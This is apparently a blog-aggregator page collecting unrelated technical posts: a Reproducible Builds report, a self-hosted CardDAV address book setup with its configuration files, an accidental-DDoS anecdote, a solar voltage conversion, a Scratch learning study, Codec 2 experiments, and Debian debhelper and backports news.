Ximin Luo also worked on better html-dir output for very very large diffs such as those for GCC. So far, this includes unreleased work on a PartialString data structure which will form a core part of a new and more intelligent recursive display algorithm.

strip-nondeterminism development

Version 0.035-1 was uploaded to unstable from experimental by Chris Lamb. It included contributions from:

  • Bernhard M. Wiedemann
    • Add CPIO handler and test case.
  • Chris Lamb
    • Packaging improvements.

Later in the week Mattia Rizzolo uploaded 0.035-2 with some improvements to the autopkgtest and to the general packaging.

We currently don't plan to maintain a backport in stretch-backports like we did for jessie-backports. Please speak up if you think otherwise.

reproducible-website development

  • Chris Lamb:
    • Add OpenEmbedded to projects page after a discussion at LinuxCon China.
    • Update some metadata for existing talks.
    • Add 13 missing talks.

tests.reproducible-builds.org

  • Alexander 'lynxis' Couzens
    • LEDE: do a quick sha256sum before calling diffoscope. The LEDE build consists of 1000 packages; using diffoscope to detect whether two packages are identical takes 3 seconds on average, while calling sha256sum on those small packages takes less than a second, so this reduces the runtime from 3h to 2h (roughly). For Debian package builds this is negligible, as each build takes several minutes anyway, so adding 3 seconds to each build doesn't matter much.
    • LEDE/OpenWrt: move toolchain.html creation to the remote node, as this is where the toolchain is built.
    • LEDE: remove debugging output for images.
    • LEDE: fixup HTML creation for toolchain, build path, downloaded software and GIT commit used.
  • Mattia 'mapreri' Rizzolo:
    • Debian: introduce Buster.
    • Debian: explain how to migrate from squid3 (in jessie) to squid (in stretch).
  • Holger 'h01ger' Levsen:
    • Debian:
      • Add jenkins jobs to create schroots and configure pbuilder for Buster.
      • Add Buster to README/about jenkins.d.n.
      • Teach jessie and ubuntu 16.04 systems how to debootstrap Buster.
      • Only update indexes and pkg_sets every 30min, as the jobs now run for almost 15 min since we test four suites (compared to three before).
      • Create HTML dashboard, live status and dd-list pages less often.
      • (Almost) stop scheduling old packages in stretch, new versions will still be scheduled and tested as usual.
      • Increase scheduling limits, especially for untested, new and depwait packages.
      • Replace Stretch with Buster in the repository comparison page.
      • Only keep build_service logs for a day, not three.
      • Add check for hanging mounts to node health checks.
      • Add check for haveged to node health checks.
      • Disable ntp.service on hosts running in the future, needed on stretch.
      • Install amd64 kernels on all i386 systems. There is a performance issue with i386 kernels, for which a bug should be filed. Installing the amd64 kernel is a sufficient workaround, but it breaks our 32/64 bit kernel variation on i386.
    • LEDE, OpenWrt: Fix up links and split TODO list.
    • Upgrade i386 systems (used for Debian) and pb3+4-amd64 (used for coreboot, LEDE, OpenWrt, NetBSD, Fedora and Arch Linux tests) to Stretch
    • jenkins: use java 8 as required by jenkins >= 2.60.1
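Alexander's sha256sum-before-diffoscope speed-up above can be sketched in shell. This is a simplified illustration of the idea, not the actual jenkins code, and `identical_or_diff` is a hypothetical helper name:

```shell
# Cheap check first: identical files need no diffoscope run.
# Only when the sha256 sums differ do we pay the ~3 s diffoscope cost.
identical_or_diff() {
    a_sum=$(sha256sum < "$1" | cut -d' ' -f1)
    b_sum=$(sha256sum < "$2" | cut -d' ' -f1)
    if [ "$a_sum" = "$b_sum" ]; then
        echo identical
    else
        diffoscope "$1" "$2"   # expensive path, taken only on mismatch
    fi
}
```

Since most packages in a reproducible build are in fact identical, the expensive path is rarely taken, which is where the hour of runtime is saved.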

Misc.

This week's edition was written by Ximin Luo, Holger Levsen, Bernhard M. Wiedemann, Mattia Rizzolo, Chris Lamb & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Rondam Ramblings: There's something very odd about the USS Fitzgerald incident

For a US Navy warship to allow itself to be very nearly destroyed by a civilian cargo ship virtually requires an epic career-ending screwup.  The exact nature of that screwup has yet to be determined, and the Navy is understandably staying very tight-lipped about it.  But they have said one thing on the record which is almost certainly false: that the collision happened at 2:30 AM local time:

Planet Debian: Colin Watson: New address book

I’ve had a kludgy mess of electronic address books for most of two decades, and have got rather fed up with it. My stack consisted of:

  • ~/.mutt/aliases, a flat text file consisting of mutt alias commands
  • lbdb configuration to query ~/.mutt/aliases, Debian’s LDAP database, and Canonical’s LDAP database, so that I can search by name with Ctrl-t in mutt when composing a new message
  • Google Contacts, which I used from Android and was completely separate from all of the above

The biggest practical problem with this was that I had the address book that was most convenient for me to add things to (Google Contacts) and the one I used when sending email, and no sensible way to merge them or move things between them. I also wasn’t especially comfortable with having all my contact information in a proprietary web service.

My goals for a replacement address book system were:

  • free software throughout
  • storage under my control
  • single common database
  • minimal manual transcription when consolidating existing databases
  • integration with Android such that I can continue using the same contacts, messaging, etc. apps
  • integration with mutt such that I can continue using the same query interface
  • not having to write my own software, because honestly

I think I have all this now!

New stack

The obvious basic technology to use is CardDAV: it’s fairly complex, admittedly, but lots of software supports it and one of my goals was not having to write my own thing. This meant I needed a CardDAV server, some way to sync the database to and from both Android and the system where I run mutt, and whatever query glue was necessary to get mutt to understand vCards.

There are lots of different alternatives here, and if anything the problem was an embarrassment of choice. In the end I just decided to go for things that looked roughly the right shape for me and tried not to spend too much time in analysis paralysis.

CardDAV server

I went with Xandikos for the server, largely because I know Jelmer and have generally had pretty good experiences with their software, but also because using Git for history of the backend storage seems like something my future self will thank me for.

It isn’t packaged in stretch, but it’s in Debian unstable, so I installed it from there.

Rather than the standalone mode suggested on the web page, I decided to set it up in what felt like a more robust way using WSGI. I installed uwsgi, uwsgi-plugin-python3, and libapache2-mod-proxy-uwsgi, and created the following file in /etc/uwsgi/apps-available/xandikos.ini which I then symlinked into /etc/uwsgi/apps-enabled/xandikos.ini:

[uwsgi]
socket = 127.0.0.1:8801
uid = xandikos
gid = xandikos
umask = 022
master = true
cheaper = 2
processes = 4
plugin = python3
module = xandikos.wsgi:app
env = XANDIKOSPATH=/srv/xandikos/collections

The port number was arbitrary, as was the path. You need to create the xandikos user and group first (adduser --system --group --no-create-home --disabled-login xandikos). I created /srv/xandikos owned by xandikos:xandikos and mode 0700, and I recommend setting a umask as shown above since uwsgi’s default umask is 000 (!). You should also run sudo -u xandikos xandikos -d /srv/xandikos/collections --autocreate and then Ctrl-c it after a short time (I think it would be nicer if there were a way to ask the WSGI wrapper to do this).

For Apache setup, I kept it reasonably simple: I ran a2enmod proxy_uwsgi, used htpasswd to create /etc/apache2/xandikos.passwd with a username and password for myself, added a virtual host in /etc/apache2/sites-available/xandikos.conf, and enabled it with a2ensite xandikos:

<VirtualHost *:443>
        ServerName xandikos.example.org
        ServerAdmin me@example.org

        ErrorLog /var/log/apache2/xandikos-error.log
        TransferLog /var/log/apache2/xandikos-access.log

        <Location />
                ProxyPass "uwsgi://127.0.0.1:8801/"
                AuthType Basic
                AuthName "Xandikos"
                AuthBasicProvider file
                AuthUserFile "/etc/apache2/xandikos.passwd"
                Require valid-user
        </Location>
</VirtualHost>

Then service apache2 reload, set the new virtual host up with Let’s Encrypt, reloaded again, and off we go.

Android integration

I installed DAVdroid from the Play Store: it cost a few pounds, but I was OK with that since it’s GPLv3 and I’m happy to help fund free software. I created two accounts, one for my existing Google Contacts database (and in fact calendaring as well, although I don’t intend to switch over to self-hosting that just yet), and one for the new Xandikos instance. The Google setup was a bit fiddly because I have two-step verification turned on so I had to create an app-specific password. The Xandikos setup was straightforward: base URL, username, password, and done.

Since I didn’t completely trust the new setup yet, I followed what seemed like the most robust option from the DAVdroid contacts syncing documentation, and used the stock contacts app to export my Google Contacts account to a .vcf file and then import that into the appropriate DAVdroid account (which showed up automatically). This seemed straightforward and everything got pushed to Xandikos. There are some weird delays in syncing contacts that I don’t entirely understand, but it all seems to get there in the end.

mutt integration

First off I needed to sync the contacts. (In fact I happen to run mutt on the same system where I run Xandikos at the moment, but I don’t want to rely on that, and going through the CardDAV server means that I don’t have to poke holes for myself using filesystem permissions.) I used vdirsyncer for this. In ~/.vdirsyncer/config:

[general]
status_path = "~/.vdirsyncer/status/"

[pair contacts]
a = "contacts_local"
b = "contacts_remote"
collections = ["from a", "from b"]

[storage contacts_local]
type = "filesystem"
path = "~/.contacts/"
fileext = ".vcf"

[storage contacts_remote]
type = "carddav"
url = "<Xandikos base URL>"
username = "<my username>"
password = "<my password>"

Running vdirsyncer discover and vdirsyncer sync then synced everything into ~/.contacts/. I added an hourly crontab entry to run vdirsyncer -v WARNING sync.
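For reference, the hourly crontab entry might look something like the following; depending on how vdirsyncer was installed, a full path to the binary may be needed since cron's PATH is minimal:

```
# min hour dom mon dow  command
0 * * * * vdirsyncer -v WARNING sync
```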

Next, I needed a command-line address book tool based on this. khard looked about right and is in stretch, so I installed that. In ~/.config/khard/khard.conf (this is mostly just the example configuration, but I preferred to sort by first name since not all my contacts have neat first/last names):

[addressbooks]
[[contacts]]
path = ~/.contacts/<UUID of my contacts collection>/

[general]
debug = no
default_action = list
editor = vim
merge_editor = vimdiff

[contact table]
# display names by first or last name: first_name / last_name
display = first_name
# group by address book: yes / no
group_by_addressbook = no
# reverse table ordering: yes / no
reverse = no
# append nicknames to name column: yes / no
show_nicknames = no
# show uid table column: yes / no
show_uids = yes
# sort by first or last name: first_name / last_name
sort = first_name

[vcard]
# extend contacts with your own private objects
# these objects are stored with a leading "X-" before the object name in the vcard files
# every object label may only contain letters, digits and the - character
# example:
#   private_objects = Jabber, Skype, Twitter
private_objects = Jabber, Skype, Twitter
# preferred vcard version: 3.0 / 4.0
preferred_version = 3.0
# Look into source vcf files to speed up search queries: yes / no
search_in_source_files = no
# skip unparsable vcard files: yes / no
skip_unparsable = no

Now khard list shows all my contacts. So far so good. Apparently there are some awkward vCard compatibility issues with creating or modifying contacts from the khard end. I’ve tried adding one address from ~/.mutt/aliases using khard and it seems to at least minimally work for me, but I haven’t explored this very much yet.

I had to install python3-vobject 0.9.4.1-1 from experimental to fix eventable/vobject#39 saving certain vCard files.

Finally, mutt integration. I already had set query_command="lbdbq '%s'" in ~/.muttrc, and I wanted to keep that in place since I still wanted to use LDAP querying as well. I had to write a very small amount of code for this (perhaps I should contribute this to lbdb upstream?), in ~/.lbdb/modules/m_khard:

#! /bin/sh

m_khard_query () {
    khard email --parsable --remove-first-line --search-in-source-files "$1"
}

My full ~/.lbdb/rc now reads as follows (you probably won’t want the LDAP stuff, but I’ve included it here for completeness):

MODULES_PATH="$MODULES_PATH $HOME/.lbdb/modules"
METHODS='m_muttalias m_khard m_ldap'
LDAP_NICKS='debian canonical'

Next steps

I’ve deleted one account from Google Contacts just to make sure that everything still works (e.g. I can still search for it when composing a new message), but I haven’t yet deleted everything. I won’t be adding anything new there though.

I need to push everything from ~/.mutt/aliases into the new system. This is only about 30 contacts so shouldn’t take too long.

Overall this feels like a big improvement! It wasn’t a trivial amount of setup for just me, but it means I have both better usability for myself and more independence from proprietary services, and I think I can add extra users with much less effort if I need to.

Postscript

A day later and I’ve consolidated all my accounts from Google Contacts and ~/.mutt/aliases into the new system, with the exception of one group that I had defined as a mutt alias and need to work out what to do with. This all went smoothly.

I’ve filed the new lbdb module as #866178, and the python3-vobject bug as #866181.

Cryptogram: Fighting Leakers at Apple

Apple is fighting its own battle against leakers, using people and tactics from the NSA.

According to the hour-long presentation, Apple's Global Security team employs an undisclosed number of investigators around the world to prevent information from reaching competitors, counterfeiters, and the press, as well as hunt down the source when leaks do occur. Some of these investigators have previously worked at U.S. intelligence agencies like the National Security Agency (NSA), law enforcement agencies like the FBI and the U.S. Secret Service, and in the U.S. military.

The information is from an internal briefing, which was leaked.

Worse Than Failure: Not so DDoS

Joe K was a developer at a company that provided a SaaS Natural Language Processing system. As Chief Engineer of the Data Science Team (a term that make him feel like some sort of mad professor), his duties included coding the Data Science Service. It provided the back-end for handling the complex, heavy-lifting type of processing that had to happen in real-time. Since it was very CPU-intensive, Joe spent a lot of time trying to battle latency. But that was the least of his problems.

The rest of the codebase was a cobbled-together mess that had been coded by the NLP researchers- scientists with no background in programming or computer science. Their mantra was “If it gets us the results we need, who cares how it looks behind the scenes?” This meant Joe’s well-designed data service somehow had to interface with applications made from a pile of ugly hacks. It was difficult at times, but he managed to get the job done while also keeping CPU usage to a minimum.

One day Joe was working away when Burt, the company CEO, burst in to their humble basement computer lab in an obvious tizzy. Burt rarely visited the “egghead dungeon”, as he called it, so something had to be amiss. “JOE!” he cried out. “The production data science service is completely down! Every customer we have gave me an angry call within the last ten minutes!”

Considering this was an early-stage startup with only five customers, Burt’s assertion was probably true, if misleading. “Wow, ok Burt. Let me get right on that!” Joe offered, feeling flustered. He took a look at the error logging service and there was nothing to be found. He then attempted to SSH to each of the production servers, with success. He decided to check performance on the servers and an entire string of red flags shot straight up the proverbial flag pole. Every production server was at 100% CPU usage.

“I have an effect for you, Burt, but not a cause. I’ll have to dig deeper but it almost seems like… a Denial of Service attack?” Joe offered, not believing that would actually be the case. With only five whitelisted customers able to connect, all of them using the NLP system to its fullest shouldn’t come even close to causing this.

While looking further at the server logs, Joe got an instant message from Xander, the software engineer who worked on the dashboards, “Hey Joe, I noticed prod was down… could it be related to something I’m doing?”

“Ummm… maybe? What is it you are doing exactly?” Joe replied, with a new sense of concern. Xander’s dashboard shouldn’t have any interaction with the DSS, so it seemed like an odd question. Requests to the NLP site would initially come to a front-end server, and if there was some advanced analysis that needed to happen, that server would RPC to the DSS. After the response was computed, the front-end server would log the request and response to Xander’s dashboard system so it could monitor usage stats.

“Well, the dashboard is out of sync,” Xander explained. There had been a bug causing events to not make it to the dashboard system for the past month. They would need to be added to make the dashboard accurate. This could have been a simple change to the dashboard’s database, but instead Xander decided to replay all of the actual HTTP requests to the front end. Many of those requests triggered processing on the DSS- processing which had already been done. And since it was taking a long time, Xander had batched up the resent requests and was running them from three different machines, thus providing a remarkably good simulation of a DDoS.

“STOP YOUR PROCESS IMMEDIATELY AND DO THIS THE RIGHT WAY!” Joe shot back, all caps intended.

“Ok, ok, sorry. I’ll get this cleaned up,” Xander assured Joe. Within 15 minutes, the server CPU usage returned to normal levels and everything was great again. Joe was able to get Burt off his back and return to his normal duties.

A few minutes later, Joe’s IM dinged again with a message from Xander. "Hey Joe, sorry about that, LOL. But are we 100% sure that was the problem? Should I do it again just to be sure?"

If there was a way for Joe to use instant messaging to send a virtual strangulation to Xander, he would have done it. But a “HELL NO!!!” would have to suffice.

Planet Debian: Joey Hess: 12 to 24 volt house conversion

Upgrading my solar panels involved switching the house from 12 volts to 24 volts. No reasonably priced charge controllers can handle 1 kW of PV at 12 volts.
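As a rough sanity check of why the higher voltage helps (my own arithmetic, not from any controller datasheet): at a fixed power, doubling the bus voltage halves the current that the controller and cabling must be rated for:

```shell
# At a fixed power, current scales as I = P / V, so a 24 V bus
# halves the current the charge controller and wiring must carry.
awk 'BEGIN { p = 1000; printf "12V: %.0f A, 24V: %.0f A\n", p/12, p/24 }'
# prints: 12V: 83 A, 24V: 42 A
```

An 83 A controller is specialist (and expensive) gear, while 40-45 A units are commonplace.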

There might not be a lot of people who need to do this; entirely 12 volt offgrid houses are not super common, and most upgrades these days probably involve rooftop microinverters, and so a switch from DC to AC. I did not find a lot of references online for converting a whole house's voltage from 12V to 24V.

To prepare, I first checked that all the fuses and breakers were rated for > 24 volts. (Actually, > 30 volts because it will be 26 volts or so when charging.) Also, I checked for any shady wiring, and verified that all the wires I could see in the attic and wiring closet were reasonably sized (10AWG) and in good shape.

Then I:

  1. Turned off every light, unplugged every plug, pulled every fuse and flipped every breaker.
  2. Rewired the battery bank from 12V to 24V.
  3. Connected the battery bank to the new charge controller.
  4. Engaged the main breaker, and waited for anything strange.
  5. Screwed in one fuse at a time.

lighting

The house used all fluorescent lights, and they have ballasts rated for only 12V. While they work at 24V, they might blow out sooner or overheat. In fact one died this evening, and while it was flickering before, I suspect the 24V did it in. It makes sense to replace them with more efficient LED lights anyway. I found some 12-24V DC LED lights for regular screw-in (edison) light fixtures. They do not seem very common; Amazon only had a few models and they shipped from China.

Also, I ordered a 15 foot long, 300 LED strip light, which runs on 24V DC and has an adhesive backing. Great stuff -- it can be cut to different lengths and stuck anywhere. I installed some underneath the cook stove hood and the kitchen cabinets, which didn't have lights before.

Similar LED strips are used in some desktop lamps. My lamp was 12V only (barely lit at 24V), but I was able to replace its LED strip, upgrading it to 24V and three times as bright.

(Christmas lights are another option; many LED christmas lights run on 24V.)

appliances

My Lenovo laptop's power supply that I use in the house is a vehicle DC-DC converter, and is rated for 12-24V. It seems to be running fine at 26V, did not get warm even when charging the laptop up from empty.

I'm using buck converters to run various USB powered (5V) ARM boxes such as my sheevaplug. They're quarter-sized, so they fit anywhere, and are very efficient.

My satellite internet receiver is running from a large buck converter feeding 12V to an inverter, which in turn feeds a 30V DC power supply. That triple conversion is inefficient, but it works for now.

The ceiling fan runs on 24V, and does not seem to run much faster than on 12V. It may be rated for 12-24V. Can't seem to find any info about it.

The radio is a 12V car radio. I used an LM317 to run it on 24V, to avoid the RF interference a buck converter would have produced. This is a very inefficient conversion; half of the power is wasted as heat. But since I can stream internet radio all day now via satellite, I'll not use the FM radio very often.
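Putting rough numbers on that heat (an illustrative sketch with an assumed load current, not measurements from my radio):

```python
# Linear regulator (LM317) vs. buck converter feeding a 12 V load
# from a 24 V bus. The linear regulator drops the excess voltage as
# heat, so its best-case efficiency is just Vout/Vin.
def linear_efficiency(v_in, v_out):
    return v_out / v_in

def linear_heat_watts(v_out, load_amps, v_in):
    # The same current flows through the pass element; heat = (Vin - Vout) * I.
    return (v_in - v_out) * load_amps

# Hypothetical 1 A car-radio load:
eff = linear_efficiency(24, 12)        # 0.5 -- half the power becomes heat
heat = linear_heat_watts(12, 1.0, 24)  # 12 W dissipated in the LM317
print(eff, heat)
```

(This ignores the LM317's dropout and quiescent current, and the bus is really closer to 26V when charging, so in practice it's a little worse.)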

Fridge... still running on propane for now, but I have an idea for a way to build a cold storage battery that will use excess power from the PV array, and keep a fridge at a constant 34 degrees F. Next home improvement project in the queue.

Planet DebianBenjamin Mako Hill: Learning to Code in One’s Own Language

I recently published a paper with Sayamindu Dasgupta that provides evidence in support of the idea that kids can learn to code more quickly when they are programming in their own language.

Millions of young people from around the world are learning to code. Often, during their learning experiences, these youth are using visual block-based programming languages like Scratch, App Inventor, and Code.org Studio. In block-based programming languages, coders manipulate visual, snap-together blocks that represent code constructs instead of textual symbols and commands that are found in more traditional programming languages.

The textual symbols used in nearly all non-block-based programming languages are drawn from English—consider “if” statements and “for” loops for common examples. Keywords in block-based languages, on the other hand, are often translated into different human languages. For example, depending on the language preference of the user, an identical set of computing instructions in Scratch can be represented in many different human languages:

Examples of a short piece of Scratch code shown in four different human languages: English, Italian, Norwegian Bokmål, and German.

Although my research with Sayamindu Dasgupta focuses on learning, both Sayamindu and I worked on local language technologies before coming back to academia. As a result, we were both interested in how the increasing translation of programming languages might be making it easier for non-English speaking kids to learn to code.

After all, a large body of education research has shown that early-stage education is more effective when instruction is in the language that the learner speaks at home. Based on this research, we hypothesized that children learning to code with block-based programming languages translated to their mother-tongues will have better learning outcomes than children using the blocks in English.

We sought to test this hypothesis in Scratch, an informal learning community built around a block-based programming language. We were helped by the fact that Scratch is translated into many languages and has a large number of learners from around the world.

To measure learning, we built on some of our own previous work and looked at learners’ cumulative block repertoires—similar to a code vocabulary. By observing a learner’s cumulative block repertoire over time, we can measure how quickly their code vocabulary is growing.
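The repertoire measure itself is simple to sketch (an illustrative toy version; our actual analysis and the factors it controls for are described in the paper):

```python
# Cumulative block repertoire: the count of *distinct* block types a
# learner has used up to and including each project, in project order.
def cumulative_repertoire(projects):
    """projects: list of lists of block types used per project."""
    seen = set()
    repertoire = []
    for blocks in projects:
        seen.update(blocks)
        repertoire.append(len(seen))
    return repertoire

# Hypothetical learner: each inner list is one project's blocks.
history = [["move", "say"], ["move", "if"], ["repeat", "if", "say"]]
print(cumulative_repertoire(history))  # [2, 3, 4]
```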

Using this data, we compared the rate of growth of cumulative block repertoire between learners from non-English speaking countries using Scratch in English to learners from the same countries using Scratch in their local language. To identify non-English speakers, we considered Scratch users who reported themselves as coming from five primarily non-English speaking countries: Portugal, Italy, Brazil, Germany, and Norway. We chose these five countries because they each have one very widely spoken language that is not English and because Scratch is almost fully translated into that language.

Even after controlling for a number of factors like social engagement on the Scratch website, user productivity, and time spent on projects, we found that learners from these countries who use Scratch in their local language have a higher rate of cumulative block repertoire growth than their counterparts using Scratch in English. This faster growth was despite having a lower initial block repertoire. The graph below visualizes our results for two “prototypical” learners who start with the same initial block repertoire: one learner who uses the English interface, and a second learner who uses their native language.

Summary of the results of our model for two prototypical individuals.

Our results are in line with what theories of education have to say about learning in one’s own language. Our findings also represent good news for designers of block-based programming languages who have spent considerable amounts of effort in making their programming languages translatable. It’s also good news for the volunteers who have spent many hours translating blocks and user interfaces.

Although we find support for our hypothesis, we should stress that our findings are both limited and incomplete. For example, because we focus on estimating the differences between Scratch learners, our comparisons are between kids who all managed to successfully use Scratch. Before Scratch was translated, kids with little working knowledge of English or the Latin script might not have been able to use Scratch at all. Because of translation, many of these children are now able to learn to code.


This blog post and the work that it describes is a collaborative project with Sayamindu Dasgupta. Sayamindu also published a very similar version of the blog post in several places. Our paper is open access and you can read it here. The paper was published in the proceedings of the ACM Learning @ Scale Conference. We also recently gave a talk about this work at the International Communication Association’s annual conference. We received support and feedback from members of the Scratch team at MIT (especially Mitch Resnick and Natalie Rusk), as well as from Nathan TeBlunthuis at the University of Washington. Financial support came from the US National Science Foundation.

,

Planet Linux AustraliaDavid Rowe: Codec 2 Wideband

I’m spending a month or so improving the speech quality of a couple of Codec 2 modes. I have two aims:

  1. Make the 700 bit/s codec sound better, to improve speech quality on low SNR HF channels (beneath 0dB).
  2. Develop a higher quality mode in the 2000 to 3000 bit/s range, that can be used on HF channels with modest SNRs (around 10dB)

I ran some numbers on the new OFDM modem and LDPC codes, and it turns out we can get 3000 bit/s of codec data through a 2000 Hz channel at down to 7dB SNR.
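That figure is consistent with a quick Shannon-capacity sanity check (my back-of-envelope arithmetic here, not part of the modem design):

```python
import math

# Shannon capacity C = B * log2(1 + SNR) for an AWGN channel.
def capacity_bps(bandwidth_hz, snr_db):
    snr_linear = 10 ** (snr_db / 10)
    return bandwidth_hz * math.log2(1 + snr_linear)

# A 2000 Hz channel at 7 dB SNR:
c = capacity_bps(2000, 7)
print(round(c))  # ~5180 bit/s, so 3000 bit/s sits comfortably under the limit
```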

Now 3000 bit/s is broadband for me – I’ve spent years being very frugal with my bits while I play in low SNR HF land. However it’s still a bit low for Opus which kicks in at 6000 bit/s. I can’t squeeze 6000 bit/s through a 2000 Hz RF channel without higher order QAM constellations which means SNRs approaching 20dB.

So – what can I do with 3000 bit/s and Codec 2? I decided to try wideband(-ish) audio – the sort of audio bandwidth you get from Skype or AM broadcast radio. So I spent a few weeks modifying Codec 2 to work at 16 kHz sample rate, and Jean Marc gave me a few tips on using DCTs to code the bits.

It’s early days but here are a few samples:

Description Sample
1 Original Speech Listen
2 Codec 2 Model, original amplitudes and phases Listen
3 Synthetic phase, one bit voicing, original amplitudes Listen
4 Synthetic phase, one bit voicing, amplitudes at 1800 bit/s Listen
5 Simulated analog SSB, 300-2600Hz BPF, 10dB SNR Listen

Couple of interesting points:

  • Sample (2) is as good as Codec 2 can do, it's the unquantised model parameters (harmonic phases and amplitudes). It's all downhill from here as we quantise or toss away parameters.
  • In (3) I’m using a one bit voicing model, this is very vocoder and shouldn’t work this well. MBE/MELP all say you need mixed excitation. Exploring that conundrum would be a good Masters degree topic.
  • In (3) I can hear the pitch estimator making a few mistakes, e.g. around “sheet” on the female.
  • The extra 4kHz of audio bandwidth doesn’t take many more bits to encode, as the ear has a log frequency response. It’s maybe 20% more bits than 4kHz audio.
  • You can hear some words like “well” are muddy and indistinct in the 1800 bit/s sample (4). This usually means the formants (spectral) peaks are not well defined, so we might be tossing away a little too much information.
  • The clipping on the SSB sample (5) around the words “depth” and “hours” is an artifact of the PathSim AGC. But dat noise. It gets really fatiguing after a while.
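That rough 20% figure is consistent with a quick count of log-spaced bands (back-of-envelope only; this isn't how Codec 2 actually allocates bits):

```python
import math

# If amplitudes are coded in bands spaced evenly on a log-frequency
# axis (as the ear's response suggests), the band count from f_lo to
# f_hi is proportional to log(f_hi / f_lo). Compare 4 kHz vs 8 kHz.
def band_ratio(f_lo, f_hi_old, f_hi_new):
    return math.log(f_hi_new / f_lo) / math.log(f_hi_old / f_lo)

# Assuming the coded bands start around 100 Hz:
ratio = band_ratio(100, 4000, 8000)
print(round((ratio - 1) * 100))  # ~19% more bands for the extra octave
```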

Wideband audio is a big paradigm shift for Push To Talk (PTT) radio. You can’t do this with analog radio: 2000 Hz of RF bandwidth, 8000 Hz of audio bandwidth. I’m not aware of any wideband PTT radio systems – they all work at best 4000 Hz audio bandwidth. DVSI has a wideband codec, but at a much higher bit rate (8000 bits/s).

Current wideband codecs shoot for artifact-free speech (and indeed general audio signals like music). Codec 2 wideband will still have noticeable artifacts, and probably won’t like music. Big question is will end users prefer this over SSB, or say analog FM – at the same SNR? What will 8kHz audio sound like on your HT?

We shall see. I need to spend some time cleaning up the algorithms, chasing down a few bugs, and getting it all into C, but I plan to be testing over the air later this year.

Let me know if you want to help.

Play Along

Unquantised Codec 2 with 16 kHz sample rate:

$ ./c2sim ~/Desktop/c2_hd/speech_orig_16k.wav --Fs 16000 -o - | play -t raw -r 16000 -s -2 -

With “Phase 0” synthetic phase and 1 bit voicing:

$ ./c2sim ~/Desktop/c2_hd/speech_orig_16k.wav --Fs 16000 --phase0 --postfilter -o - | play -t raw -r 16000 -s -2 -

Links

FreeDV 2017 Road Map – this work is part of the “Codec 2 Quality” work package.

Codec 2 page – has an explanation of the way Codec 2 models speech with harmonic amplitudes and phases.

Planet DebianNiels Thykier: debhelper 10.5.1 now available in unstable

Earlier today, I uploaded debhelper version 10.5.1 to unstable.  The following are some highlights compared to version 10.2.5:

  • debhelper now supports the “meson+ninja” build system. Kudos to Michael Biebl.
  • Better cross building support in the “makefile” build system (PKG_CONFIG is set to the multi-arched version of pkg-config). Kudos to Helmut Grohne.
  • New dh_missing helper to take over dh_install --list-missing/--fail-missing while being able to see files installed from other helpers. Kudos to Michael Stapelberg.
  • dh_installman now logs what files it has installed so the new dh_missing helper can “see” them as installed.
  • Improve documentation (e.g. compare and contrast the dh_link config file with ln(1) to assist people who are familiar with ln(1))
  • Avoid triggering a race-condition with libtool by ensuring that dh_auto_install run make with -j1 when libtool is detected (see Debian bug #861627)
  • Optimizations and parallel processing (more on this later)

There are also some changes to the upcoming compat 11

  • Use “/run” as “run state dir” for autoconf
  • dh_installman will now guess the language of a manpage from the path name before using the extension.
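A sketch of what that path-first language guessing might look like (an illustration in Python; debhelper itself is written in Perl and this is not its actual code):

```python
import re

# Guess a manpage's language from its install path, e.g.
# usr/share/man/fr/man1/foo.1 -> "fr"; fall back to the file
# extension, e.g. foo.de.1 -> "de"; else default to "C" (English).
def guess_manpage_language(path):
    m = re.search(r'/man/([a-z]{2}(?:_[A-Z]{2})?)/man[0-9]/', path)
    if m:
        return m.group(1)
    m = re.search(r'\.([a-z]{2})\.[0-9]$', path)
    if m:
        return m.group(1)
    return "C"

print(guess_manpage_language("debian/tmp/usr/share/man/fr/man1/foo.1"))  # fr
print(guess_manpage_language("docs/foo.de.1"))                           # de
print(guess_manpage_language("docs/foo.1"))                              # C
```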

 


Filed under: Debhelper, Debian

Planet DebianJoey Hess: DIY solar upgrade complete-ish

Success! I received the Tracer4215BN charge controller where UPS accidentally-on-purpose delivered it to a neighbor, and got it connected up, and the battery bank rewired to 24V in a couple hours.

charge controller reading 66.1V at 3.4 amps on panels, charging battery at 29.0V at 7.6A

Here it's charging the batteries at 220 watts, and that picture was taken at 5 pm, when the light hits the panels at nearly a 90 degree angle. Compare with the old panels, where the maximum I ever recorded at high noon was 90 watts. I've made more power since 4:30 pm than I used to be able to make in a day! \o/

Planet DebianAlexander Wirt: Stretch Backports available

With the release of stretch we are pleased to open the doors for stretch-backports and jessie-backports-sloppy. \o/

As usual with a new release we will change a few things for the backports service.

What to upload where

As a reminder, uploads to a release-backports pocket are to be taken from release + 1, uploads to a release-backports-sloppy pocket are to be taken from release + 2. Which means:

Source Distribution Backports Distribution Sloppy Distribution
buster stretch-backports jessie-backports-sloppy
stretch jessie-backports -

Deprecation of LTS support for backports

We started supporting backports as long as there is LTS support as an experiment. Unfortunately it didn’t work out: most maintainers didn’t want to support oldoldstable-backports (squeeze) for the lifetime of LTS. So things started to rot in squeeze, and most packages didn’t receive updates. After long discussions we decided to deprecate LTS support for backports. From now on squeeze-backports(-sloppy) is closed and will not receive any updates. Expect it to get removed from the mirrors and moved to the archive in the near future.

BSA handling

We - the backports team - didn’t scale well in processing BSA requests. To get things better in the future we decided to change the process a little bit. If you upload a package which fixes security problems please fill out the BSA template and create a ticket in the rt tracker (see https://backports.debian.org/Contribute/#index3h2 for details).

Stretching the rules

From time to time it’s necessary not to follow the backports rules, e.g. when a package needs to be in testing or a version needs to be in Debian. If you think you have one of those cases, please talk to us on the list before uploading the package.

Thanks

Thanks have to go out to all the people making backports possible, and that includes up front the backporters themselves, who upload the packages and track and update them on a regular basis, but also the buildd team making the autobuilding possible and the ftp masters for creating the suites in the first place.

We wish you a happy stretch :) Alex, on behalf of the Backports Team

CryptogramSeparating the Paranoid from the Hacked

Sad story of someone whose computer became owned by a griefer:

The trouble began last year when he noticed strange things happening: files went missing from his computer; his Facebook picture was changed; and texts from his daughter didn't reach him or arrived changed.

"Nobody believed me," says Gary. "My wife and my brother thought I had lost my mind. They scheduled an appointment with a psychiatrist for me."

But he built up a body of evidence and called in a professional cybersecurity firm. It found that his email addresses had been compromised, his phone records hacked and altered, and an entire virtual internet interface created.

"All my communications were going through a man-in-the-middle unauthorised server," he explains.

It's the "psychiatrist" quote that got me. I regularly get e-mails from people explaining in graphic detail how their whole lives have been hacked. Most of them are just paranoid. But a few of them are probably legitimate. And I have no way of telling them apart.

This problem isn't going away. As computers permeate even more aspects of our lives, it's going to get even more debilitating. And we don't have any way, other than hiring a "professional cybersecurity firm," of telling the paranoids from the victims.

